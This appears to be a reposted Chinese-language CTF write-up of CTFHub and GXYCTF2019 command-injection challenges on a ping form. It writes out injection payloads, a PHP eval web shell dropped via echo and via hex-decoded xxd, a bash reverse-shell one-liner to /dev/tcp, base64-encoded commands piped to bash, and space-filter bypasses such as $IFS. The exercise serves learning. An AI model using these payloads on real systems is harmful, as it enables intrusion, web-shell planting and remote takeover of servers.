CTFHub web技能樹 RCE


 

 

 

 一個簡單的ping,還沒有過濾,源碼也給出來了

 

ls一下

127.0.0.1 & ls

有一個可疑的php文件,,,但是直接訪問和 cat 都出不來。。。

試了幾下反彈shell,沒成功。。。於是直接用echo了一個一句話進去

127.0.0.1 & echo "<?php eval(@\$_POST['a']);?>" > 3.php

注意這里$轉義了一下,不轉的話會被識別成變量。。

之后拿我40米長的菜刀

 

 php用了注釋。。和想的差不多

這題竟然花了那么久

我是這樣反彈shell。。

bash -i >& /dev/tcp/ip/port 0>&1

 

 

 

 過濾空格的

127.0.0.1&cat<flag_10974101912578.php

 

< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等

 

命令注入-過濾目錄分隔符

cat \\flag_is_here\\flag_12052032130931.php

Y2F0IFxcZmxhZ19pc19oZXJlXFxmbGFnXzEyMDUyMDMyMTMwOTMxLnBocA
127.0.0.1 & echo Y2F0IFxcZmxhZ19pc19oZXJlXFxmbGFnXzEyMDUyMDMyMTMwOTMxLnBocA | base64 -d | bash

<?php eval(@$_POST['a']);?>
3C3F706870206576616C2840245F504F53545B2761275D293B3F3E
127.0.0.1 & echo 3C3F706870206576616C2840245F504F53545B2761275D293B3F3E | xxd -r -ps > 4.php

感覺這兩種繞過應該都可以成功啊,可是他就是都沒成功。。。。

 

[GXYCTF2019]Ping Ping Ping
 
過濾了空格,<,flag
 
空格用$IFS可以,再拼接一下,繞過

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM